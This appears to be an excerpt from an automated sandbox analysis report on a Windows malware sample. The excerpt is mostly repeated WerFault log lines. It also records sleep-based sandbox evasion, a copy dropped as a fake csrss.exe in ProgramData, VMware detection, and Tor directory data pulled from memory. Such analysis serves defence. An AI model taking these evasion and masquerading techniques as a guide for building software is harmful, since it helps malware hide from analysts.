Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\klWGq3yDcQ.exe TID: 2144Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\ProgramData\Drivers\csrss.exe TID: 1696Thread sleep count: 3246 > 30Jump to behavior
Source: C:\ProgramData\Drivers\csrss.exe TID: 1696Thread sleep time: -324600s >= -30000sJump to behavior
Source: C:\ProgramData\Drivers\csrss.exe TID: 1696Thread sleep count: 6746 > 30Jump to behavior
Source: C:\ProgramData\Drivers\csrss.exe TID: 1696Thread sleep time: -674600s >= -30000sJump to behavior
Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-7968
Source: C:\ProgramData\Drivers\csrss.exeWindow / User API: threadDelayed 3246Jump to behavior
Source: C:\ProgramData\Drivers\csrss.exeWindow / User API: threadDelayed 6746Jump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_00404004 ReadConsoleInputA,CreateJobObjectW,EnumDateFormatsExA,CreateNamedPipeW,CreateFileMappingW,SetConsoleWindowInfo,TlsGetValue,OpenWaitableTimerW,CreateFileW,GetWindowsDirectoryA,GetSystemInfo,InitializeSListHead,GetModuleHandleW,0_2_00404004
Source: klWGq3yDcQ.exe, 00000001.00000003.1742964639.0000000003A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <BS3tF3Yb5O3GboaRnAiA-SFxZeDJJ/gxOHdfHb+UpPThHSQtie02t2IFTVwYTujg-SGqjdhy5z+UWie9qWpTVh7wQ02kxeu3pb2A/0831mTM-SGxPze+4w8vb7Ex+Grg4s8WcOhOAfglM7YRVR12n9FE-SHvHTqtQJVvtqhysj9MMDODzq/JBUw3cHbvvurAsctU-SH38y3G5LV1lzFVwpiKdUE0Lfs3ZLaK9z3SfIJRC7v4-SIBhDXnIiEZyyvWelB+D0NMCTWI4pbHSxxXQ8VMMIr0-SJwxpZ4u92Ce5KQ9i8DHmDbpLf4YMu9hIpCENr9bHgQ-SJ3t8o4RocIZ5xvdBegEpz+uzZ49YniQwLKrRumqkyI-SJ7bMbcPl3+K8PJP4yIgzh66MrsfPgkvC4WtfjJ98fU-SKBae+pSHMleIfk83TExYU83MytXzmkq/WMtSBJ/5kg-SKPjxSwh6I6au0I6QG9/6VPN0Otwxs56MaMzeyfUbo4-SKZBpcMoLsD23H6Ahk9z310inUH0K0gVWC7+TPANkeQ-SKm4S03VIfp9X8DDzHtm2J+0FbFb2NU6c1rHOPJ+s2w-SKn0NeC7YSf0U8OOT6SUAJjTUSMS2/wm0Oka7bnZHFM-SLWh2GoyF6OmTfcjnCk6x5vjIcAqR5S4Sz+TcRO5v8w-SL/Ftv+pjRFYI8FwoeCowlJ5RbnK8FxhAdZObGIg9Mg-SMFZ6GLlvmyuXTd02ktl9zxx++P7IT6chKCDyXK/DWc-SMVofzDNTBRFeeXvnyamlFsTqPujVbkVuNdz/6YBVP0-SNtStDR1RX7xWpbpT6x6pahujmTzkI4CtA6bljKRkIo-SN/19UXRnhKRbhdVJkk4cXVc2AFNlQHZGCT3EaC7/QE-SOfUNjKx6Poytu4t0fXHVjChyQT68rKeXoSmrMHR410-SOhuAUg4o/K+Og9FBpa6hFa3XvA8T/Y6zkzd/jPCcn8-SO797AiTXjmD6mGBQN4IFBZTU679jKiJtdZQF5361zc-SQ7jHGfSsmE5DB3dCbdtu7xJ7YSe34meVDElzhEjqOw-SQ+rCDgFcmDgCp8WSr+ncPa7KVMzHzmxpUp/DZ038e0-SRlLQu96bOX34GnWVnj7HKb1W7PGy4KVLPYaCASEXb0-SRmCBZPvpQ+wkH8nH0qaxoUvFknnB3pxfGy+2X98z6w-SR/vAM6NlcvJFiiMs+xS3Plg737DRZilY9PdRnC9BRY-SShTHduoxVaDwDbAYFt0gWov/VKOUwtM9v1iOniAnb4-SStAMGf3kcnKjDGuOM/tK5GnnkePqAJCgTYBmpSJCUg-STLJiib+1Fipo5pYdU9gXnubkoVuXuisubFbafq5JDU-STOSaNwHjJDMDrWN0IVDfmRxlks1gpkMa0DN85fMjiI-ST6M7rDVBZR0F3QDdommJaLr96AVWngSXL5FaljE4c0-SUNOAetLlTsBdCZB3hfr29w6S1QBSRovQrw+Zf0MlaU-SUQwkIBSzB46xSYyY/Jeb061jcikPjG16gk/OyzLC10-SUfVU5VURk3Eh+103rykejE+ULybpqf6wPWdsjrfnc0-SUijfeaqYEXjnhbxsrLU41Uk4N106EHKkhmyL/8gG0c-SWe2NoGcpMD60A0ioFTqH86dfC34F82HWZEV+vqXDcY-SWlCxrbVEMhNTjzLW38Ux1Rxxr+drXqnudfmAZlipAs-SWsawbviYlkBcdPHkVYJ/AXnR0XBr+dMY4X1QVDyJ1g-SZf/4bEJN/FO5zyzZXRL3SIegSI781Zrd4upKUFXNSk-SaAQg0iLLzFlj2xlOGD6wHlE9tlM5SX1n18kSTC9OYM-SaIr3HA3wIwKV/+DGtJ/OUYcYiVFsrE2oYPlTTf+xjk-SamgvU6xK4WjO8ZDggpWoR5sW/LsB27CGCkXeCNkpIM-Sax9zEP+qHFPFnCr+lmP5DXnazNB1get/GQaPQoQ4xU-SbT5uSdQ4cXoLhHLdb8Tm2HUHo62xQCaBMwyGDd/g3c-SbZKe8Ek5PjgoPvoza1uZiY2uJNcPZN4CAJ2I0LUEBY-ScOEAuntUl5HnjJOYP+nMfKuL4BGXX5C6G3PpKbAKLk-SdGzxbU34CIa72vReuGegm6T6dijeCow6qmjAV23Mlc-SdqkqoZZuVPuhIav1Apn1/P1IuNwBQNM3ykY70Su0gQ-SeG8k2YJ6K6A21McK2hL5JUbxeemynDBSQG2b5NIXBo-Sey5xGOPFayu9EwAN8EqGXQ+i84cwiar9YHtJqIBX8U-Se7R0hpqEM+10Coh94+iG5r2Y324wQ6Uy29LSR4H0ak-Se9R98FZeXW09AjvQM6iCj0TOMZTzDI/5oKXwE0BAKg-SfJ5PDNfU2WHZ9o6fRs3vq3B/La1zqyuxmNN4NCbMBs-SgJk+Jc/BiSYUsQDynvCuN+ijiVQdO84eHw5LnLSSsc-SgU5TakoWF3nj096twri43JGDuBiLW1LONGhwaaNBcY-Sgy4BhlFk6ZfvAYbCOOF2OLXmICA9GzDnc398GiVRX8-Sg3y8tIfSl8Wekmnsp4JCWgYzRjq4vOjLo3gLIfAU80-ShY9d0DOPMXOkyHsqiNCN9DE28mnKxLxuLDObaBzha0-ShirlXRl99R9PyGaKyHusxiTwumWU1qChjUqU7XjTDo-Shz/adTXIuj/5ZLFeNN1Hd+AJagKfryuIdaYDijCj+E-SiZzhbpI1t8jc/BXgvY8ZenjQTmrqOc1pmayzPKbczk-Si3X78ESpr35kPXqHNh+hYcoIYuanX/aWEvizl1nrb0-SjYLA7hp7gltG6Xdtytfdw70U6jmlfbbVRL2wKROh4I-SkWOdu1Og7Dex65sE9MhqIszly/363me10QVqeGM478-SlI3XeLKVSh321wIqYKaNwr3s5+LaK9UdZjJaeHtdJE-Slb7OP38mdPhxoHYQKu5t35fK37i26
Source: klWGq3yDcQ.exe, 00000001.00000003.1800315933.0000000003451000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887881053.00000000046E6000.00000004.00000020.00020000.00000000.sdmp, cached-microdescs.new.1.drBinary or memory string: MIGJAoGBALKN3lFV1+mkbPHYM6ZP8E5+CjY8GhgFSjM0ZHC8JvfLZt43yWBCSPq1
Source: klWGq3yDcQ.exe, 00000001.00000003.1725771282.000000000384C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000003.1724036596.00000000035A0000.00000004.00000020.00020000.00000000.sdmp, unverified-microdesc-consensus.tmp.1.drBinary or memory string: m y7GRJMAy3qGR1lhg6mTZzEgwSWdYxPtUKYtqEMUV8Yw
Source: klWGq3yDcQ.exe, 00000001.00000003.1823806958.0000000003453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y/R51l2yYyphkOzNTCS/jkV76dFWOuP6pikJzol8tgOIVz1QEmulAgMBAAE=
Source: klWGq3yDcQ.exe, 00000001.00000003.1823806958.0000000003453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /3FVGQ/x4WLt2xC2h4eY01oA4VvQEMuhxxOJX7nHYk992+JGgImBAgMBAAE=
Source: csrss.exe, 00000004.00000002.3485243692.0000000000C49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: klWGq3yDcQ.exe, 00000001.00000003.1827563459.000000000345A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBANzbX9VMRjByYYiWI0aKIpBDV903CLdYwmj5NvMCii0IVR2ThY4/2N1k
Source: klWGq3yDcQ.exe, 00000001.00000003.1743043519.00000000039EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <qvlLhYhQn9q5uqU8TH7U-ymfjPOUfdZ+HhZgDxnIiOccmXbl9GzHcYzb8Azbyyls-ynZWfZ5IwPlGgjrQtltR10GIo3ImQgWfXr6oQ3Dl6j8-yoMG7IiJOzZ4DT9aGzFzbIzxit8ZtgNtQc9SvvNjtu8-yoMm7m99syUL9AYK1OUvjB3k0Ssvf23zJPZQrQtBo+k-yoZlNyQat1+2EsI1PE2htPvq2rJmKqED13mTCXvXyQ4-yo1alLeCsVHjkaVoa/kWrQWNIOsZGiNesJA9Eahby08-yo+lA5RSppAFJ5SqS5UjWw6MRfqQ3nvj5Rg1CAdAClc-yqfHsxbVzBe9FsgkmdM476jEpAuZu8G0EmBV0yWW0SE-yqyDmVy+CacgoyGd0M0fISMl/GeIN9PuGo/UMWTEgFM-yq3P8KmeJy1e6ZIX85/Vr7Qa8bifJtx3ANdPqjoJ5+Q-yr4CF87zl9rcjM1sCMsbN+hwQWbqridu/CTqxWWEXks-yr6Ecub/1tOFEXf/5BGYX90K7tE4GVIpuHQ7bt1Yp5A-ysZYQW/VYSpRkxehhnCPOzecdf8h/MEjzQMiBQOA+ow-ytq4Il9wnlvagWcP+AeDad0VeLaT9kFgLvsAmPdsW8o-yuIp28mGF/wACnkMUKYRUdcap2hx7cwUU/5xNIVlP8k-yugdI19RO6xX3hZtQlGblUCCCGjKsB/4IlUoo1/URLI-yvJ8sXeYwJjQQUawn+55Bw7JtMSkCmbK/NL/PMiKHMQ-ywj7SwXuD2oSMimnb8+F1q5HBJ0azc4T10zBXzk2OVo-yw2x2BQSf/4nKf7DtuTor3eVHVXaXqSuDMIZ1XIAyNU-yxMhQSkp1B3y2VeFjXEjYKhpAVamoO6zRVts1rVYAm8-yxYV4iNLlGjgMXpXwueb6OelyWI/bJPtFFnQGi++LWc-yxYqUQW7exz6gw7UEq2NCdR05Tl8dvZqWNQEMfMJZyU-yxkrdAZUaasj04rcaRJ3nDyopNn8SisRWvg99lMvvBQ-yzIn9tVvHfnIdx4CXj6l8qac55BiX676xyMjjf16eRs-yz4wqGdfDoEPCX1VX9BqnHyuJQwr/22reRmwlshhOwE-y1wsnyq1Mplx0bf0fepmkeDaGLEPek4hQbPVHU8d2lE-y3T0aR/MDwPgTS4kJo9wqMSANFRvMCDxE7xypysAFA4-y4AV78N9Os9jNMNGp183F8AUIGlk9rKjIelP6s4JFGg-y5IfzspsxZROwi7xnP6SlvVfqubd/7RenIYCHZeHRT8-y5QQ+v/ryxR+gG6U8VS7MQb9MTM5aSVXaUKI3ZFgPCs-y5YOyHyYkQ0uXquaRqeg5JCrtOfBw17Q5S18UteqKjw-y6MmfcINDklfKvXjYBEbru9ukdehNYKoRCOT1cA8ttQ-y7GRJMAy3qGR1lhg6mTZzEgwSWdYxPtUKYtqEMUV8Yw-y8Nu+mSH9Wx0fO7Qh4FrxH7XxZCpONnqS5cKT2UNwn8-y8l8arTODxevzAVo+hJ15tOagH7aD4yWiBJ3miiI43Q-y87ETtfQn5AqcIbrm1r1OMjMfzXLpGO7PpXFseCrv5o-y9c3PYzLowp9ceLSf7KXC4q04DzJ19sw4I9h5iANkvM-y+8asNcjUpF6AXpkhH+NqUHQZb1PXKZ1/SvvWVlPe9I-y//aokZz8acm53xCM2oRpyl71z70uHJCm4/m4k/Hra0-zAY51Nri+ghIddrndWIhyboYWi0X+f5KpMJmOqcn2rs-zBbVzi7xKUXqiSsuAGMwoqz6qWvKB7JO3GR7KRGAqhk-zBtKv73g5ycnCzUbH1CPuzYG0N+rOA08wJbTQrUJXOY-zCP5rsIbXHmJxV+38GQtjsB+r2AAAqHaSJbkUTtTgmA-zCmw9gD4hn0g5kDH6sx/aZNlTjnlxwulJJAXfBmwTO8-zEaudWGJthkurisjuFiN2xUVW9d8f/u6Mev50zPzync-zEvMvKEoR94v2PGRc/7hQ7U0JQG6ohQZ/bKZG1712Ws-zFfxVJeBGQlSiFPjy0G0arjf/OYTPwcGHD+8BWKpCKc-zF4qL0hMKwnZ37dQQ7ClnfQ7ABdi2WkEJcdnrbS55G4-zGS7pNaEZDPQkAjWxozgVjDqiBRTo3WupQlNtkPMXBk-zGfNDbCmzcE2NKMweNSFnUyQ96DKVaOVHjmZaZ3ba08-zG8hS7iRjiHMJ/CcdRZli0lWc6V/2oaGdcA5kaCFBlk-zHPyHoBHNqwnCOrR36gjGtWLrTnYxOSzL4TMM97ttkg-zIGK/4zDGkjYn/g4wCoNEHtl4+onEGwLkSxkABh6Btw-zJth0jE0ba2lhtrEXLWQNEhsz4H/Ssp2Bix57YigI6w-zJ62zqfTIuAz1kvV73AVwLG/72s6IHGHfVus5IQp7JA-zLdWMt6aYYnWUSEgZUAWNQyCS9NNZPxRkaV+Q4H7y8o-zMOsxSYkUBosOPWUncopJFVr+RIEOLd7znwjN0LKE8Y-zMRcloGTynfCrLdJ4KqY+HX/BfNepkAcBRyk9aLtcCM-zMsrKjBa7imfXE1z8hYzeAC7VJgQ1vhs1xhcVCetF6M-zNAG/AUd8DYuH7r1X7Zqu2Yrhf/0wiRlDkRC7Vovgyk-zNVhoiXx9T7znVA4ThjQfdGzNoWCLV2KVjOAACjW7yE-zOFOIjDhepPn+GTnh6gvsLbOzxXr1ZEfr+0h9i/u40U-zOSS2gaBOafiKY4fkXNwtEfWHoJyOAoZ33MAOqKCSG8-zOYZwwYMsgPkitvSwtfvm2ibt4Rm4qjKJiMcr6iLr28-zO1+Ktle/h9PwtZC/IIukThUlJyldvkH1Qn3byjcmnU-zP+0ZjtqgmyYuTpf1rGCQOMpw71iI/2776VwFroR4fI-zRDxbA/g0biXrNrBfWVNC5069DTrh71bFfctj2trysI-zRP44NqITqW3csw/GiH5EL11c+fsSs
Source: klWGq3yDcQ.exe, 00000001.00000003.1725771282.000000000384C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000003.1724036596.00000000035A0000.00000004.00000020.00020000.00000000.sdmp, unverified-microdesc-consensus.tmp.1.drBinary or memory string: m SQ7jHGfSsmE5DB3dCbdtu7xJ7YSe34meVDElzhEjqOw
Source: klWGq3yDcQ.exe, 00000001.00000003.1827563459.000000000345A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBAK7h1VmCi65Obi5jNTRteVQcxmCUm10opeTD7+Q1UVttM/Hv6XudG/RA
Source: klWGq3yDcQ.exe, 00000001.00000003.1843189879.000000000345C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBAKZKuJzV8ZX+cjLj4pS5kCOpDnhqEMu9pStjmoyoAgEAaM0J4FeJUTox
Source: csrss.exe, 00000004.00000002.3485243692.0000000000C49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: klWGq3yDcQ.exe, 00000001.00000003.1742964639.0000000003A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BS3tF3Yb5O3GboaRnAiA-SFxZeDJJ/gxOHdfHb+UpPThHSQtie02t2IFTVwYTujg-SGqjdhy5z+UWie9qWpTVh7wQ02kxeu3pb2A/0831mTM-SGxPze+4w8vb7Ex+Grg4s8WcOhOAfglM7YRVR12n9FE-SHvHTqtQJVvtqhysj9MMDODzq/JBUw3cHbvvurAsctU-SH38y3G5LV1lzFVwpiKdUE0Lfs3ZLaK9z3SfIJRC7v4-SIBhDXnIiEZyyvWelB+D0NMCTWI4pbHSxxXQ8VMMIr0-SJwxpZ4u92Ce5KQ9i8DHmDbpLf4YMu9hIpCENr9bHgQ-SJ3t8o4RocIZ5xvdBegEpz+uzZ49YniQwLKrRumqkyI-SJ7bMbcPl3+K8PJP4yIgzh66MrsfPgkvC4WtfjJ98fU-SKBae+pSHMleIfk83TExYU83MytXzmkq/WMtSBJ/5kg-SKPjxSwh6I6au0I6QG9/6VPN0Otwxs56MaMzeyfUbo4-SKZBpcMoLsD23H6Ahk9z310inUH0K0gVWC7+TPANkeQ-SKm4S03VIfp9X8DDzHtm2J+0FbFb2NU6c1rHOPJ+s2w-SKn0NeC7YSf0U8OOT6SUAJjTUSMS2/wm0Oka7bnZHFM-SLWh2GoyF6OmTfcjnCk6x5vjIcAqR5S4Sz+TcRO5v8w-SL/Ftv+pjRFYI8FwoeCowlJ5RbnK8FxhAdZObGIg9Mg-SMFZ6GLlvmyuXTd02ktl9zxx++P7IT6chKCDyXK/DWc-SMVofzDNTBRFeeXvnya